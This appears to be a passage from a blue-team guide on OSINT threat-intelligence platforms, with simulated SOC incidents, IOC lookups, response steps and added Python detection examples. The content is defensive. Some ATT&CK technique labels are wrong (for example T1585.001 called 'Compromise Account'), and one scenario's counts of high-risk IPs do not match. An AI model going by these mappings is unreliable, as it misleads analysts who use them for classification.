OPEN-SOURCE INTELLIGENCE (OSINT) TOOLS AND PLATFORMS FOR CYBERSECURITY BLUE TEAMS IN 2025 WITH SCENARIO EXAMPLES
BY IZZMIER IZZUDDIN
1. THREAT INTELLIGENCE PLATFORMS
ALIENVAULT OTX (OPEN THREAT EXCHANGE)
AlienVault OTX is a collaborative threat intelligence platform that allows users to share and
receive timely information about emerging threats, including IOCs (Indicators of
Compromise) such as malicious IPs, domains, file hashes and threat actor activity.
Use Cases:
• Search for an IP, domain, URL or file hash to determine if it is associated with known
malicious activity.
• Integrate OTX pulses into your SIEM to enrich alerts with threat context.
• Receive updates from the community regarding new malware strains or threat actor
campaigns.
• Share findings from internal incidents with the OTX community to strengthen
collective defence.
Practical Application: SOC analysts can input a suspicious IP observed in brute force
attempts into OTX and identify associated campaigns, determine if the IP was flagged
in other investigations and use the contextual data to escalate the alert severity.
Scenario Simulation: Brute Force Attack Detected — IP Investigation using AlienVault OTX
Incident Summary
• Alert Source: SIEM (Splunk)
• Alert Name: Multiple Failed SSH Login Attempts
• Target Host: [Link]
• Timeframe: 2025-08-05 04:15:20 to 04:20:45
• Detected IP Address: [Link]
• Username Attempted: admin, root, webadmin
• Login Port: 22 (SSH)
• Failed Attempts: 128 within 5 minutes
• Internal Alert Severity: Medium
Step 1: Initial Triage
Log (from SIEM):
event_time=2025-08-05T04:16:02Z
source_ip=[Link]
destination_ip=[Link]
destination_port=22
protocol=TCP
event_type=authentication_failure
username=root
message="SSH authentication failed"
Analyst Observation:
• Rapid login failures from a single external IP targeting SSH
• Common usernames used (root, admin)
• Suggestive of brute force attempt
Step 2: Investigate IP Address using AlienVault OTX
Tool Used: [Link]
Action:
• Analyst logs into AlienVault OTX and searches the IP address [Link]
OTX Results:
• Pulse Matches: 3
• Tags: Brute Force, SSH Scanner, Mirai-like, APT Activity
• First Seen: 2025-07-24
• Last Seen: 2025-08-04
• Related Domains: [Link], ip-checker24[.]com
• Related File Hashes: e9b1a22d3f7b4b1e89045a8e3c88941c
Enrichment from Pulse:
• Pulse Title: Mirai Scanner Campaign - July 2025
• Pulse Description: "This IP was observed in a recent wave of SSH brute force
attacks originating from a compromised IoT botnet using Mirai-based payloads."
• Linked to CVE-2023-28771 (RCE in exposed routers)
Step 3: Update SIEM Alert Context with OTX Intelligence
Enrichment Summary Added to Ticket:
• The IP [Link] is known to be part of an active brute force and IoT scanning
campaign.
• The IOC appears in 3 OTX pulses, tagged with SSH scanning activity.
• Historical data shows the IP actively used across Europe and APAC in multiple
attacks.
• MITRE ATT&CK Mapping:
o T1110: Brute Force
o T1046: Network Service Scanning
o T1589.003: Gather Victim Identity - Credentials
Step 4: SOC Decision-Making
Escalation Decision:
• Based on OTX confirmation and brute force pattern, escalate severity from Medium
to High.
Action Items:
• Block IP [Link] at perimeter firewall.
• Check other endpoints for the same source IP in logs.
• Create detection rule for SSH login attempts from high-risk IPs appearing in
AlienVault OTX.
• Subscribe to the relevant OTX Pulse to monitor similar campaigns.
Step 5: Contribute to Threat Community
Optional Analyst Contribution:
• Analyst uploads internal SSH honeypot log with anonymised data to AlienVault OTX.
• Adds custom pulse titled: Brute Force Attempt - Internal SSH Targets - August 2025
• Tags added: SSH, Brute Force, Mirai, T1110, CrowdsourcedThreatIntel
ABUSEIPDB
AbuseIPDB is a crowd-sourced database of malicious IP addresses reported for abusive
behaviour such as brute force attacks, scanning, spam and exploitation.
Use Cases:
• Check an IP address seen in firewall or SIEM logs to confirm if it has been reported
for abuse.
• Use the API to automate checking of IP addresses at scale.
• Correlate login attempts or port scans with the AbuseIPDB reputation score to
prioritise investigations.
Practical Application: An analyst investigating failed SSH logins from multiple global
IPs can check the IPs on AbuseIPDB. If multiple users report similar abuse patterns,
the IPs can be blocked or flagged for further action.
Scenario Simulation: SSH Login Failures — IP Reputation Check using AbuseIPDB
Incident Summary
• Alert Source: EDR + SIEM (Elastic)
• Alert Name: Repeated SSH Login Failures from Multiple Foreign IPs
• Target Host: [Link] ([Link])
• Port: 22 (SSH)
• Total Failed Attempts: 542 in 10 minutes
• Unique External IPs Involved: 4
• Internal Alert Severity: Medium
Step 1: Extract Involved IPs from SIEM Logs
Extracted IPs from logs:
• [Link]
• [Link] (already escalated via OTX in previous scenario)
• [Link]
• [Link]
Log Entry:
event_time=2025-08-05T06:02:10Z
event_type=ssh_auth_failure
source_ip=[Link]
username_attempted=admin
port=22
protocol=TCP
message="Invalid SSH login attempt"
Step 2: Investigate IP Reputation using AbuseIPDB
Tool Used: [Link]
IP 1: [Link]
• Abuse Score: 98 / 100
• Reports: 420 (in last 7 days)
• Common Categories: SSH brute force, web scanning
• First Reported: 2025-07-27
• Last Reported: 2025-08-05
• ISPs: Likely compromised server in Eastern Europe
IP 2: [Link]
• Abuse Score: 85 / 100
• Reports: 301 (across global users)
• Reported Comments:
o “Automated SSH login attempts”
o “Scans on multiple ports from same subnet”
IP 3: [Link]
• Abuse Score: 4 / 100
• Reports: 2 (not consistent, last report 2 months ago)
• Comment: “Unusual web traffic, but not verified malicious”
Step 3: Enrich Alert Ticket with AbuseIPDB Findings
Context Summary:
• 2 out of 4 IPs ([Link] and [Link]) have extremely high abuse scores
and multiple global reports for SSH brute force attacks.
• [Link] appears to be low-risk based on limited reports and age of last
activity.
• Cross-reference with OTX confirms [Link] is also part of an ongoing brute
force campaign.
Step 4: SOC Decision-Making and Action Plan
Escalation:
Raise alert severity from Medium to High, due to coordinated brute force behaviour from
multiple IPs with high abuse scores.
Actions Taken:
• Block [Link], [Link] and [Link] at perimeter and internal
firewalls.
• Add all three IPs to the internal threat intelligence blocklist.
• Mark [Link] as low-risk but continue monitoring in SIEM for recurring
patterns.
• Create alert logic to flag any IP with AbuseIPDB score >70 that performs >20 SSH
attempts in 10 minutes.
Step 5: Automation Planning
API Integration Plan:
• Use AbuseIPDB API to enrich future SIEM alerts with abuse scores automatically.
• Create a script to query every suspicious IP seen in failed SSH attempts and tag
them with:
o abuse_score
o last_reported
o report_count
• Route enriched events to a high-fidelity detection stream.
Python API Call:
import requests

# AbuseIPDB API v2 "check" endpoint (query parameters: ipAddress, maxAgeInDays)
API_URL = 'https://api.abuseipdb.com/api/v2/check'
headers = {
    'Key': 'YOUR_API_KEY',
    'Accept': 'application/json'
}
ip = 'IP_TO_CHECK'  # the suspicious source IP taken from the SIEM alert
response = requests.get(API_URL, params={'ipAddress': ip, 'maxAgeInDays': 90}, headers=headers)
response.raise_for_status()  # fail loudly on a bad key or rate limit instead of printing an error body
print(response.json())
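The Step 4 alert logic (AbuseIPDB score above 70 combined with more than 20 SSH failures in 10 minutes) and the Step 5 enrichment tags, worked through as an added Python example that is not the author's code: it parses the key=value SSH failure events from Step 1, counts failures per source IP in a sliding 10-minute window, reads abuse_score, last_reported and report_count out of an AbuseIPDB v2 check response, and flags sources that exceed both thresholds. The log lines and the lookup results are constructed offline stand-ins using TEST-NET addresses; only the response field names (abuseConfidenceScore, totalReports, lastReportedAt) are those of the real v2 API.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one key=value SSH event (the Step 1 log, flattened onto a single line)."""
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    fields["event_time"] = datetime.strptime(fields["event_time"], "%Y-%m-%dT%H:%M:%SZ")
    return fields


def max_failures_in_window(events, window=timedelta(minutes=10)):
    """Per source IP, the largest number of ssh_auth_failure events inside any sliding window."""
    times = defaultdict(list)
    for ev in events:
        if ev.get("event_type") == "ssh_auth_failure":
            times[ev["source_ip"]].append(ev["event_time"])
    peaks = {}
    for ip, stamps in times.items():
        stamps.sort()
        start, best = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:  # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        peaks[ip] = best
    return peaks


def enrichment_tags(check_response):
    """Reduce an AbuseIPDB v2 /check response body to the three tags planned in Step 5."""
    data = check_response["data"]
    return {
        "abuse_score": data["abuseConfidenceScore"],
        "last_reported": data.get("lastReportedAt"),
        "report_count": data["totalReports"],
    }


def flag_high_risk_ssh_sources(events, lookups, score_threshold=70,
                               attempt_threshold=20, window=timedelta(minutes=10)):
    """Step 4 rule: abuse score > 70 AND more than 20 SSH failures within 10 minutes."""
    flagged = []
    for ip, attempts in max_failures_in_window(events, window).items():
        if ip not in lookups:
            continue  # no reputation data: leave the alert at its default severity
        tags = enrichment_tags(lookups[ip])
        if tags["abuse_score"] > score_threshold and attempts > attempt_threshold:
            flagged.append({"source_ip": ip, "attempts": attempts, **tags})
    return flagged


def _line(ts, ip, user):
    return (f'event_time={ts:%Y-%m-%dT%H:%M:%SZ} event_type=ssh_auth_failure source_ip={ip} '
            f'username_attempted={user} port=22 protocol=TCP message="Invalid SSH login attempt"')


def build_sample_events():
    """Constructed events (TEST-NET addresses): two fast sprayers and one slow source."""
    base = datetime(2025, 8, 5, 6, 2, 10)
    lines = []
    for i in range(25):  # 25 failures in about 8 minutes from each of two sources
        lines.append(_line(base + timedelta(seconds=20 * i), "198.51.100.7", "admin"))
        lines.append(_line(base + timedelta(seconds=20 * i + 5), "203.0.113.9", "root"))
    for i in range(5):  # 5 failures a minute apart: below the attempt threshold
        lines.append(_line(base + timedelta(minutes=i), "192.0.2.44", "webadmin"))
    return [parse_event(l) for l in lines]


# Constructed stand-ins for AbuseIPDB v2 /check responses, mirroring the Step 2 findings.
SAMPLE_LOOKUPS = {
    "198.51.100.7": {"data": {"ipAddress": "198.51.100.7", "abuseConfidenceScore": 98,
                              "totalReports": 420, "lastReportedAt": "2025-08-05T05:58:01+00:00"}},
    "203.0.113.9": {"data": {"ipAddress": "203.0.113.9", "abuseConfidenceScore": 4,
                             "totalReports": 2, "lastReportedAt": "2025-06-03T11:20:00+00:00"}},
    "192.0.2.44": {"data": {"ipAddress": "192.0.2.44", "abuseConfidenceScore": 85,
                            "totalReports": 301, "lastReportedAt": "2025-08-04T22:14:10+00:00"}},
}

if __name__ == "__main__":
    for hit in flag_high_risk_ssh_sources(build_sample_events(), SAMPLE_LOOKUPS):
        print(hit)
```

Only the first source trips the rule: the second sprays just as fast but has a score of 4, and the third has a high score but too few attempts.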
THREATFOX (BY [Link])
ThreatFox is a free community-driven threat intelligence platform focused on providing
IOCs related to malware, including IPs, domains, file hashes and malware family tags.
Use Cases:
• Submit a known malicious hash to identify associated malware and campaigns.
• Look up domains or IPs used in phishing kits or malware C2 communication.
• Download threat intelligence feeds for ingestion into SIEM or threat hunting
platforms.
Practical Application: During a malware investigation, an analyst extracts a file hash
from an infected host and checks it on ThreatFox. The platform reveals the hash is tied
to AgentTesla, with associated C2 domains that can be blocked immediately.
Scenario Simulation: Malware Infection — IOC Lookup with ThreatFox
Incident Summary
• Initial Detection: EDR (Microsoft Defender for Endpoint)
• Alert: Suspicious File Execution – Potential Keylogger
• Host: [Link]
• File Name: Invoice_Aug2025.exe
• SHA256 Hash: 39fc92096d0c8a9913e58f7bcb49e7b3ad417d9f42e902fa7fd0a4c13f1892f6
• Observed Behaviour:
o Injects into [Link]
o Spawns PowerShell and sets up scheduled task
o Exfiltrates data via HTTP POST
o Connects to [Link][.]com
Step 1: Extract File Hash and Perform Lookup in ThreatFox
Tool Used: [Link]
Action:
• Analyst enters the SHA256 hash 39fc92096d0c8a9913e58f7bcb49e7b3ad417d9f42e902fa7fd0a4c13f1892f6 into the ThreatFox search bar
ThreatFox Output:
• Malware Family: AgentTesla
• IOC Type: SHA256
• Threat Type: Malware C2
• Confidence Level: High
• Tags: AgentTesla, Keylogger, Infostealer, APT-Lite, PowerShellDropper
• Related Indicators Found:
o Domains:
§ [Link][.]com
§ loginsync2[.]net
o IPs:
§ [Link]
§ [Link]
o File Hashes (other variants)
o Email used in payload config: techsync24@[Link]
Step 2: Enrich Internal Investigation with ThreatFox Data
Updated Alert Context in SIEM:
• The file executed on finance-pc07 is confirmed as AgentTesla based on ThreatFox
lookup
• Domains and IPs seen in C2 communications match ThreatFox IOC set
• MITRE ATT&CK Mapping:
o T1056.001: Keylogging
o T1113: Screen Capture
o T1071.001: Application Layer Protocol (Web Protocols)
o T1053.005: Scheduled Task
Step 3: Threat Response Actions
Immediate Containment:
• Isolate finance-pc07 from the network
• Block the following on proxy/firewall:
o [Link][.]com
o loginsync2[.]net
o [Link]
o [Link]
• Revoke user credentials from the infected host
• Check endpoint for creation of scheduled tasks or registry persistence
Step 4: Threat Hunting Across Organisation
Hunting Query Example (in Elastic):
[Link]: [Link] AND
process.command_line: "*[Link]*"
File Search Across Environment:
• Look for presence of the same SHA256 hash on other endpoints
• Query proxy logs for outbound HTTP traffic to identified C2s
• Investigate any use of the identified ProtonMail address in email metadata
Step 5: Download and Integrate ThreatFox Feeds
Action:
• Download full AgentTesla-related IOC feed from ThreatFox
• Format: CSV, JSON or STIX
• Push feed to:
o SIEM for IOC correlation
o Email gateway for domain filtering
o EDR for file hash detection
OTX PULSES
OTX Pulses are curated threat intelligence packages shared by the AlienVault OTX
community. Each pulse contains contextual IOCs related to a specific campaign, malware
family or attack technique.
Use Cases:
• Subscribe to threat actor-specific pulses to stay updated on their latest TTPs and
infrastructure.
• Enrich SIEM alerts with context from relevant pulses to improve triage decisions.
• Automatically ingest new IOCs into detection engines or threat hunting pipelines.
Practical Application: If your SIEM generates an alert for a login from a suspicious IP
and that IP is part of a pulse related to APT29, the alert can be prioritised for
immediate review with added threat context.
Scenario Simulation: OTX Pulse Matches Suspicious Login — Contextual Threat Enrichment
Incident Summary
• Alert Source: SIEM (QRadar)
• Alert Name: Suspicious VPN Login from Foreign IP
• User: [Link]@[Link]
• Login Time: 2025-08-05 03:02:12
• Source IP: [Link]
• Location: Kazakhstan
• User Agent: Mozilla/5.0 (Linux; Android 10)
• Internal Risk: Medium (due to user previously logging in only from Malaysia)
Step 1: Initial Alert Review
Log from SIEM:
event_time=2025-08-05T03:02:12Z
user=[Link]@[Link]
source_ip=[Link]
location=Kazakhstan
device=unknown
event_type=VPN_Login_Success
message="Successful VPN login from foreign IP"
Analyst Notes:
• Login succeeded from unfamiliar geo-location.
• User agent not previously seen for this user.
• No MFA triggered.
• Potential credential compromise.
Step 2: Lookup Source IP in OTX and Review Related Pulses
Tool Used: [Link]
Action:
• Analyst searches IP [Link] on OTX.
Result:
• IP is listed in a Pulse titled: APT29 Credential Harvesting Infrastructure - July 2025
• OTX Pulse ID: e9af12c0d7e647db9f3a716aa678c07d
• Tags: APT29, Credential Theft, VPN Abuse, SSH Scanning, Proxy Hosting
• Indicators in Pulse:
o IPs: [Link], [Link], [Link]
o Domains: vpn-login24[.]com, office365-secure[.]net
o File Hash: 7f2ab3e2b9f0a6f0aeb332e83dc5b331 (JS Keylogger)
• MITRE ATT&CK Techniques:
o T1078: Valid Accounts
o T1110.001: Password Guessing
o T1585.001: Compromise Account
Step 3: Pulse Context Added to Alert and SIEM Ticket
Pulse Enrichment Summary:
• Source IP is part of a campaign attributed to APT29 targeting remote access portals.
• This Pulse includes IOCs linked to phishing kits and stolen credentials.
• The IP has been reported in multiple credential stuffing attempts across Asia.
Step 4: Threat Response Triggered
Decision:
Elevate alert severity to High and escalate to Incident Response.
Actions:
• Immediately revoke VPN token and reset password for [Link]@[Link]
• Block IP [Link] at VPN concentrator and firewall
• Hunt across logs for any access to internal systems by this user post-login
• Subscribe to the Pulse and import all related IOCs to:
o SIEM correlation rules
o Perimeter firewall blacklist
o Threat intelligence enrichment engine
Step 5: Subscribe and Automate OTX Pulse Feeds
Analyst subscribes to the following Pulse collections:
• APT29 Campaigns
• VPN Phishing Kits
• Cloud Credential Abuse (July–August 2025)
Automation Plan:
• Configure automatic ingestion of new OTX Pulses using API or SIEM connector
• Update detection rules to trigger enrichment from matched pulse IDs
• Use pulse tags (APT29, VPN Abuse) to prioritise related alerts
FRODO TRACKER
Frodo Tracker is a tool that detects command-and-control (C2) communications by
comparing observed DNS or HTTP(S) traffic patterns against those typically used by
malware.
Use Cases:
• Identify active malware beacons within internal network traffic.
• Profile unknown domains that show beaconing-like behaviour.
• Use behavioural patterns to detect threats that evade signature-based detection.
Practical Application: An analyst notices repeated low-volume DNS queries to a newly
registered domain. By running the traffic through Frodo Tracker, the domain is
confirmed to match known C2 beaconing patterns, triggering a high-severity
investigation.
Scenario Simulation: Detecting C2 Beaconing via DNS using Frodo Tracker
Incident Summary
• Alert Source: NDR (Network Detection and Response) sensor + DNS logs
• Alert Type: Suspicious Low-Volume Repetitive DNS Queries
• Destination Domain: [Link]
• Affected Host: [Link]
• Timeframe: 2025-08-05 01:00:00 to 03:00:00
• Frequency: One DNS request every 10 minutes (121 total)
• Internal Alert Severity: Low (Anomaly only, no matching IOC)
Step 1: Review Network Logs for Anomalous Behaviour
Extracted DNS Logs:
timestamp=2025-08-05T01:12:00Z
src_ip=[Link]
hostname=[Link]
query=[Link]
type=A
response=[Link]
flags=NOERROR
timestamp=2025-08-05T01:22:00Z
query=[Link]
...
(repeats every 10 minutes)
Analyst Notes:
• The queried domain does not appear in internal allowlists or threat feeds.
• The host is not known to contact any *.[Link] domains.
• Regular interval and subdomain entropy suggest beaconing behaviour.
Step 2: Behavioural Analysis using Frodo Tracker
Tool Used: Frodo Tracker (local instance)
Action:
• Analyst exports 3 hours’ worth of DNS logs for host-win11-lab01
• Data is fed into Frodo Tracker for analysis
Analysis Output from Frodo Tracker:
• Detected Pattern: High-entropy subdomain structure with fixed interval querying
• Classification: Matches C2 beaconing behaviour (similar to AsyncRAT and njRAT)
• Score: 92% similarity to known HTTP(S)/DNS beaconing models
• Domain Age: Registered 2 days ago
• Flags:
o Low query volume with high timing consistency
o Subdomain d1e6ccf3b does not resolve via CDN pattern
o Behavioural similarity to payload staging infrastructure
Step 3: Escalate Alert and Confirm Threat
Updated Alert Context:
• The domain [Link] is not malicious by static signature, but
shows beaconing behaviour indicative of active malware C2.
• Matches known beaconing models with over 90% similarity.
• Domain was recently registered, consistent with attacker infrastructure setup.
Step 4: Incident Response Actions
Immediate Actions:
• Block domain [Link] and all subdomains at DNS resolver and proxy level
• Isolate host-win11-lab01 from network
• Capture memory and disk image for forensic review
• Search internal DNS logs for other hosts querying the same or similar domains
• Correlate traffic to identify possible payload delivery or lateral movement
Threat Hypothesis:
• Host may be infected with a lightweight RAT or backdoor that uses DNS for C2
• Possible initial compromise via phishing or browser exploit
Step 5: Detection Rule Creation and Long-Term Mitigation
Detection Logic Added:
• Flag hosts making repeated DNS queries to:
o Recently registered domains (less than 7 days old)
o Domains with entropy score >0.85
o Beaconing pattern (query interval within 10% jitter)
Integration:
• Frodo Tracker alerts forwarded to SIEM
• Weekly DNS beaconing scan across all endpoints enabled
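The three Step 5 criteria (recently registered domain, subdomain entropy above 0.85, query interval within 10% jitter) implemented as an added Python example that is neither Frodo Tracker's code nor the author's: it groups DNS log lines by source host and registered domain, scores the subdomain labels for entropy, measures interval consistency, and takes domain age from a WHOIS result supplied as input. The log lines, the WHOIS ages, the 8-character minimum label length for entropy scoring, the naive two-label domain split and the rule that an alert needs the beaconing pattern plus one other criterion are all assumptions made for the example; the sample reuses the d1e6ccf3b subdomain from Step 2 under a reserved .test domain.

```python
import math
import re
from collections import defaultdict
from datetime import datetime, timedelta

KV_RE = re.compile(r"(\w+)=(\S+)")
MIN_LABEL_LEN = 8  # assumption: short labels such as www or mail are never scored for entropy


def parse_dns_line(line):
    """Parse one flattened key=value DNS log line in the Step 1 format."""
    fields = dict(KV_RE.findall(line))
    fields["timestamp"] = datetime.strptime(fields["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
    return fields


def normalised_entropy(label):
    """Shannon entropy of one DNS label scaled to 0..1 (1.0 = every character distinct)."""
    n = len(label)
    if n < MIN_LABEL_LEN:
        return 0.0
    counts = defaultdict(int)
    for ch in label.lower():
        counts[ch] += 1
    h = -sum(c / n * math.log2(c / n) for c in counts.values())
    return h / math.log2(n)


def split_qname(qname):
    """Naive split into (registered domain, subdomain labels); assumption: no public-suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def interval_jitter(timestamps):
    """Median gap in seconds and the worst relative deviation from it; None below 3 queries."""
    ts = sorted(timestamps)
    if len(ts) < 3:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    median = sorted(gaps)[len(gaps) // 2]
    if median <= 0:
        return None
    return median, max(abs(g - median) / median for g in gaps)


def evaluate(queries, domain_age_days, max_age_days=7, entropy_threshold=0.85,
             max_jitter=0.10, min_queries=6):
    """Score one (host, registered domain) pair against the three Step 5 criteria."""
    stamps = [q["timestamp"] for q in queries]
    subs = [lab for q in queries for lab in split_qname(q["query"])[1]]
    entropy = max((normalised_entropy(s) for s in subs), default=0.0)
    timing = interval_jitter(stamps)
    finding = {
        "queries": len(queries),
        "recently_registered": domain_age_days is not None and domain_age_days < max_age_days,
        "high_entropy": entropy > entropy_threshold,
        "beaconing": timing is not None and len(stamps) >= min_queries and timing[1] <= max_jitter,
        "entropy": round(entropy, 3),
        "median_interval_s": timing[0] if timing else None,
    }
    # Alert when the timing pattern holds together with at least one of the other two criteria.
    finding["alert"] = finding["beaconing"] and (finding["recently_registered"] or finding["high_entropy"])
    return finding


def scan(lines, domain_ages):
    """Group DNS log lines by (source host, registered domain) and evaluate each group."""
    groups = defaultdict(list)
    for line in lines:
        ev = parse_dns_line(line)
        groups[(ev["src_ip"], split_qname(ev["query"])[0])].append(ev)
    return {key: evaluate(evs, domain_ages.get(key[1])) for key, evs in groups.items()}


def build_sample_lines():
    """Constructed DNS logs: a 10-minute beacon with 2.5% jitter beside ordinary browsing."""
    base = datetime(2025, 8, 5, 1, 12, 0)
    lines, t = [], base
    for i in range(13):  # beacon: gaps cycle through 585 / 600 / 615 seconds
        lines.append(f"timestamp={t:%Y-%m-%dT%H:%M:%SZ} src_ip=10.20.30.40 "
                     f"query=d1e6ccf3b.updates-sync.test type=A response=198.51.100.23")
        t += timedelta(seconds=600 + (i % 3 - 1) * 15)
    t = base
    for gap in (30, 900, 4, 2000, 120, 60):  # benign: irregular lookups of a long-lived domain
        lines.append(f"timestamp={t:%Y-%m-%dT%H:%M:%SZ} src_ip=10.20.30.40 "
                     f"query=www.example.com type=A response=192.0.2.10")
        t += timedelta(seconds=gap)
    return lines


SAMPLE_DOMAIN_AGES = {"updates-sync.test": 2, "example.com": 9000}  # constructed WHOIS ages in days

if __name__ == "__main__":
    for key, finding in scan(build_sample_lines(), SAMPLE_DOMAIN_AGES).items():
        print(key, finding)
```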
MALPEDIA
Malpedia is a community-driven platform developed by Fraunhofer FKIE that provides
detailed information on malware families, including behaviours, samples, YARA rules and
classification data.
Use Cases:
• Identify malware families by matching hashes to known entries.
• Review family behaviours to predict potential lateral movement or persistence
mechanisms.
• Use YARA signatures from Malpedia in sandbox or endpoint scanning tools.
Practical Application: A security researcher discovers a suspicious executable and
matches it to the FormBook family using Malpedia. This helps determine the
malware’s data theft capabilities and potential data exfiltration vectors.
Scenario Simulation: Malware Family Attribution via Malpedia
Incident Summary
• Alert Source: EDR (CrowdStrike Falcon)
• Alert Type: Suspicious Executable Dropped via USB Media
• Host: [Link]
• Filename: [Link]
• SHA256 Hash: 72a6bcde556dca5c3b85fc9a5f7dbfdd1c4fda84376ac2e28e12cb0ed7f8a1cc
• Behaviour Observed:
o Drops DLL in temp directory
o Injects into [Link]
o Makes HTTP POST requests to [Link]
o Steals clipboard data and screenshots
Step 1: Preliminary Analysis of the File
Sandbox Results:
• Flags behaviour related to credential theft
• Suspicious string: Formgrabber, BrowserInject, KeyHook
• Attempts to access Chrome and Firefox credential stores
• Network traffic is unencrypted HTTP with formdata payloads
Step 2: Use Malpedia to Identify Malware Family
Tool Used: [Link]
Action:
• Analyst submits SHA256 hash to Malpedia search
Malpedia Result:
• Malware Family Identified: FormBook
• Classification: Info-Stealer / Keylogger
• Tags: Credential Theft, Spyware, Clipboard Hijack, Screenshot Capture
• YARA Rule Matched: formbook_autoextract_2023.yar
• Samples: Multiple samples from 2023–2025 with similar PE structure
• MITRE ATT&CK Mapping:
o T1056.001: Keylogging
o T1113: Screen Capture
o T1057: Process Discovery
o T1027: Obfuscated Files or Information
Step 3: Review Malpedia Family Behaviour Profile
Key Family Behaviours (FormBook):
• Steals credentials from browsers and email clients
• Captures keystrokes and clipboard data
• Takes periodic screenshots of active windows
• Uses injection techniques to evade detection
• Transmits data to C2 over HTTP POST requests
• Often delivered via malicious email attachments or removable media
Step 4: Apply YARA Signature and Correlate in Environment
YARA Integration:
• Analyst retrieves YARA rule for FormBook from Malpedia
• Applies rule to:
o Endpoint scanning using Velociraptor
o Sandbox for other suspected samples
o Email gateway to scan older attachments
Correlated Detection:
• Two additional files detected across user endpoints:
o [Link]
o [Link]
These were delivered via phishing emails during the same week.
Step 5: Incident Response Actions
Containment:
• Isolate affected host sales-laptop001
• Quarantine all matched executables
• Revoke exposed credentials used in Chrome and Outlook
Eradication and Recovery:
• Reimage affected endpoint
• Update email and web filters with IOCs from Malpedia
• Push IOC feeds and YARA rules to SIEM and EDR
Threat Hunt:
• Search for communication with [Link] across 30 days
• Hunt for indicators from FormBook campaign (paths, mutexes, registry changes)
GREYNOISE
GreyNoise is a platform that analyses internet-wide scan and noise traffic to help analysts
differentiate between targeted attacks and opportunistic background noise.
Use Cases:
• Check whether a suspicious IP address is involved in global mass scanning or part
of a known threat campaign.
• Reduce false positives by filtering out benign scanning activity.
• Profile threat actor infrastructure seen across the internet.
Practical Application: A firewall log shows multiple hits from a foreign IP. GreyNoise
confirms it is part of a mass scan campaign and not targeting the organisation
specifically, allowing the alert to be deprioritised.
Scenario Simulation: Internet Scan or Targeted Attack? Investigating with GreyNoise
Incident Summary
• Alert Source: Perimeter Firewall + SIEM (Suricata + Splunk)
• Alert Type: Multiple TCP Connection Attempts from Foreign IP
• Destination IP: [Link] (external-facing web app)
• Source IP: [Link]
• Timeframe: 2025-08-05 06:33:00 to 06:37:00
• Port Targets: 80, 443, 8080, 22, 3306
• Alert Severity: Medium (based on port sweep activity)
Step 1: Review Firewall Logs
Extracted Log:
timestamp=2025-08-05T06:34:18Z
src_ip=[Link]
dest_ip=[Link]
dest_port=8080
protocol=TCP
action=DROP
reason=Unsolicited SYN
sensor=perimeter-fw01
Observation:
• Unsolicited SYN packets across multiple ports
• No authentication attempts
• Matches signature: "Port Sweep Detected"
Step 2: Investigate Source IP using GreyNoise
Tool Used: [Link]
Action:
• Analyst queries [Link] via the GreyNoise IP Lookup Tool
GreyNoise Output:
• Classification: Benign
• Noise: True
• RIOT: False
• Last Seen: 2025-08-04
• Tags: Mass Scanner, Mirai Scanner, Linux Scanner, Port 23, Port 8080
• ASN: AS14061 (DigitalOcean)
• Reverse DNS: [Link]
Summary Statement from GreyNoise:
"This IP address has been observed scanning the entire internet for exposed services. It
does not appear to be specifically targeting your organisation."
Step 3: Decision-Making and Triage
Updated Alert Context:
• Activity is part of a known internet-wide mass scanning operation
• No indication of targeted reconnaissance or exploitation
• Source IP is classified as Noise by GreyNoise
SOC Action:
• Deprioritise the alert
• Add IP to passive blocklist (optional)
• No further investigation required
• Use this alert as input for improving false positive handling in future correlation
rules
Step 4: Enhance SIEM Detection Logic
Detection Logic Update:
• If an IP appears in GreyNoise and is classified as Noise, apply tag Internet Noise and
reduce priority score by 2
• If Noise = True and no login or exploit attempts follow, suppress after first detection
• Enable automated enrichment via GreyNoise API
GreyNoise API Query Example:
curl -s -H "key: YOUR_API_KEY" \
[Link]
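The Step 4 detection logic worked through as an added Python example (not GreyNoise's code and not the author's): a noise-classified IP gets the Internet Noise tag and a priority reduction of 2, and repeat detections of that IP are suppressed unless a login or exploit attempt follows within a window. The lookup results, the alert stream, the 1-10 priority scale, the one-hour follow-on window and the set of event types counted as follow-on activity are assumptions constructed for the example; only the noise/riot/classification field names follow the Step 2 output.

```python
from datetime import datetime, timedelta

# Event types treated as "login or exploit attempts" after a scan (assumption for this example).
FOLLOW_ON_EVENTS = {"authentication_failure", "ssh_auth_failure", "exploit_attempt", "waf_block"}


class NoiseTriage:
    """Applies the Step 4 rules to firewall alerts using GreyNoise-style lookup results."""

    def __init__(self, lookups, follow_on_window=timedelta(hours=1)):
        self.lookups = lookups            # ip -> {"noise": bool, "riot": bool, "classification": str}
        self.follow_on_window = follow_on_window
        self.first_seen = {}              # ip -> time of the first noise-classified detection

    def triage(self, alert, events):
        """alert: {source_ip, timestamp, priority}; events: later events from any sensor.
        Assumes triage runs once the follow-on window for the alert has elapsed."""
        ip = alert["source_ip"]
        decision = {"source_ip": ip, "priority": alert["priority"], "tags": [], "suppressed": False}
        info = self.lookups.get(ip)
        if not info or not info.get("noise"):
            return decision               # unknown or non-noise IP: keep the original priority
        decision["tags"].append("Internet Noise")
        decision["priority"] = max(0, alert["priority"] - 2)
        deadline = alert["timestamp"] + self.follow_on_window
        followed = any(ev["source_ip"] == ip and ev["event_type"] in FOLLOW_ON_EVENTS
                       and alert["timestamp"] <= ev["timestamp"] <= deadline for ev in events)
        if followed:
            decision["tags"].append("Noise With Follow-On Activity")
            return decision               # the scanner came back with a real attempt: keep it visible
        if ip in self.first_seen:
            decision["suppressed"] = True  # seen before with no follow-on: suppress the repeat
        else:
            self.first_seen[ip] = alert["timestamp"]
        return decision


# Constructed lookup results (TEST-NET addresses) mirroring the Step 2 classification fields.
SAMPLE_LOOKUPS = {
    "198.51.100.8": {"noise": True, "riot": False, "classification": "benign", "last_seen": "2025-08-04"},
}


def build_sample():
    """Constructed alert stream: three port-sweep alerts from a noise IP, one from an unknown IP."""
    t0 = datetime(2025, 8, 5, 6, 33, 0)
    sweep = "Port Sweep Detected"
    alerts = [
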